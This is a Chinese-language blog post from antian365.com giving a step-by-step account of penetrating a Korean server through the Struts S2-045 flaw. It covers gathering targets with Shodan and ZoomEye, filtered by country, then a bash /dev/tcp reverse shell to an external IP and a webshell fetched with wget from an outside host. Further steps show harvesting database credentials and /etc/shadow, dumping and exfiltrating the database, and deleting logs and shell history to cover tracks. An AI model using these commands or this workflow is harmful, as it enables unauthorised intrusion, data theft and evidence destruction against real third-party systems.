利用Strutss02-045漏洞快速渗透韩国某服务器

Byantian365.com  simeon

Struts s02-045漏洞非常火爆，国内好多网站均是采用这种架构，下面就如何快速获取Linux服务器的权限进行分析和分享，在文章结尾部分高度浓缩渗透linux技巧和方法总结，欢迎大家拍砖！

1.获取URL地址

可以通过百度、zoomeye（https://www.zoomeye.org/）和shadon（https://www.shodan.io/）进行搜索，我目前整理了一些关键词：

enterprise.action

register.action

info.action

login.action

index.action

2.存在漏洞检测

还可以根据国家进行收集，例如site:kr，这是韩国网站，你懂的，收集到地址后，直接在团队小伙伴修改的程序中进行检测，如图1所示，显示该网站存在漏洞。如果显示不是“It’s vulnerable s2_045”则表明该网站已经修护或者不存在漏洞，就果断放弃吧！

图1检测漏洞是否存在

3.获取网站真实物理路径

  获取网站真实路径可以通过locate、find、whereis三个命令来实现，locate命令，前提是前期执行过updatedb命令，如果没有执行则直接执行updatedb命令后再执行。例如“locate *.jsp”可以获取所有的jsp文件名称和路径，如图2所示，会将所有的jsp文件给检索出来。

图2使用locate命令检索jsp文件

有时候网站的jsp程序太多也无法快速定位，笔者摸索出来一个技巧，就是通过查看网站的独立文件，例如打开网页中的图片等文件，获取其名称后，再通过“locate prd01.jpg”命令来检索，会提高效率，如图3所示，直接减少到4条记录，通过跟网站对比。命令执行结果中可以判断网站正式路径就在下面两个中：

/home/root/ROOT_20160524/resource/images/kor/main/prd01.jpg

/home/root/ROOT_20160923/resource/images/eng/main/prd01.jpg

图3使用locate检索图片文件

4.果断反弹shell

   使用bash -i >&/dev/tcp/59.110.xx.xxx/4433 0>&1或者/usr/bin/bash-i >& /dev/tcp/59.110.xx.xxx/4433 0>&1命令执行反弹，反弹IP地址59.110.xx.xxx，端口为4433，注意该IP是独立IP，且能监听4433端口。如图4所示。

图4反弹到shell执行

5.下载Webshell到服务器

   使用命令“wget–O/home/root/ROOT_20160524/resource/images/a.jsphttp://218.1.xx.xx/tklama/1.txt”下载1.txt到目录“/home/root/ROOT_20160524/resource/images”并保存为a.jsp文件，如图5所示。

图5下载Webshell到服务器

6.获取webshell

    在浏览器中访问http://203.xxx.xxx.xxx:8080/resource/images/a.jsp，如图6所示，顺利成功获取webshell。

图6获取Webshell

7.获取网站数据库配置信息

   网站数据库配置信息一般在WEB-INF/classes/db.properties，如图7所示，可以获取该网站所使用的数据库oracle的账号以及密码等信息，后续动作就不展开讨论了。

图7获取数据库密码信息

8.渗透总结

（1）使用关键字获取url，url中一定要带有action，例如index.action，收集到的关键字：

enterprise.action

register.action

info.action

login.action

index.action

（2）搜索引擎

杜娘：http://www.baidu.com

zoomeye:https://www.zoomeye.org/

shodan :https://www.shodan.io/

google镜像：https://google.tse.moe/ https://g.hancel.net/

（3）反弹监听服务器命令

bash -i>& /dev/tcp/59.110.xx.xxx/4433 0>&1

/usr/bin/bash -i >& /dev/tcp/59.110.xx.xxx/4433 0>&1

（4）定位物理真实路径

 locate *.jsp locate logo.jpg

需要寻找网站独立的图片文件，js文件等。

（5）下载并保持webshell

wget –O/home/site/antian365.com.jsp  http://218.1.xx.xxx/tklama/1.txt

（6）获取密码哈希值

 cat /etc/shadow

（7）查看数据库信息

locatedb.properties

locatejdbc*

locateWEB-INF

（8）命令行下连接数据库

whereis Mysql

Mysql –hlocalhost–uroot –ppassword

（9）mysqldump –hlocalhost–uroot –ppassword somedb>somedb.sql

将somedb数据导出为somedb.sql

（10）压缩文件

tar –zcvfsomedb.tar.gz somedb.sql

将/home/www目录下的所有文件打包到tmp目录

tar –zcvf  /tmp/somedb.tar.gz  /home/www/

移动somedb.tar.gz到站点目录/home/www/下：

mv/tmp/somedb.tar.gz /home/www/somedb.tar.gz

下载文件：

http://www.antian365.com/somedb.tar.gz

下载完毕删除文件，切记别乱删除文件。rm –rf文件名，是彻底删除某个文件

rm –rf/home/www/somedb.tar.gz

（11）清除日志

rm -rf/var/log/access.log

rm -rf/var/log/wtmp

rm -rf/var/log/lastlog

rm -rf/var/log/secure*

rm -rf/root/.bash_history

rm -rf/root/.mysql_history

history –c

 欢迎加入安天365安全技术交流群（51383306）进行技术讨论，无关人员勿进！